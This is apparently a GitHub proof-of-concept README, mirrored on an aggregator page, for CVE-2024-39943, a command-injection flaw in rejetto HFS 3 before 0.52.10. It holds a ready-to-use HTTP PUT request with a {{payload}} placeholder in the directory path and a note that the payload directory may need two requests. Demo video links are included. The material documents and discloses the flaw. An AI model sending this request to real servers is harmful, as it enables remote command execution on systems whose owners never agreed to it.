CVE-2024-39943 rejetto HFS (aka HTTP File Server) 3 before 0.52.10 on Linux, UNIX, and macOS allows OS command execution by remote authenticated users (if they have Upload permissions). This occurs because a shell is used to execute df (i.e., with execSync instead of spawnSync in child_process in Node.js).# CVE-2024-39943-Poc
CVE-2024-39943 rejetto HFS (aka HTTP File Server) 3 before 0.52.10 on Linux, UNIX, and macOS allows OS command execution by remote authenticated users (if they have Upload permissions). This occurs because a shell is used to execute df (i.e., with execSync instead of spawnSync in child_process in Node.js).
Deploy: ``` ./hfs --config config.yaml ```
## Poc: user admin
https://github.com/truonghuuphuc/CVE-2024-39943-Poc/assets/20487674/c9e3d7ec-9181-43b5-8230-82c36fbf8a2b
## Poc: user guest
https://github.com/truonghuuphuc/CVE-2024-39943-Poc/assets/20487674/cbb55ece-2c68-4ade-a09d-8b9bf3b961d8
## update 6/7/2024: Poc user guest
https://github.com/truonghuuphuc/CVE-2024-39943-Poc/assets/20487674/f5e0c190-419a-4017-83ab-8a303b7176a8
<!--Note:
Payload is directory name exist , If the directory does not exist, you need to send the request twice. In the video, because a directory with the name contain payload already exists on the HFS server, I only need to send the request once
https://github.com/truonghuuphuc/CVE-2024-39943-Poc/assets/20487674/8bc8c270-24a5-4ad6-b32b-a75243afcd6a
-->
```
PUT /tmp/{{payload}}/poc11.txt HTTP/1.1
Host: <host>
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
Connection: close
Cookie: {{Cookie}}
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 11
aaaaaaaaaaa
```
Log in to view the POC file snapshot cached by Shenlong Bot
Log in to view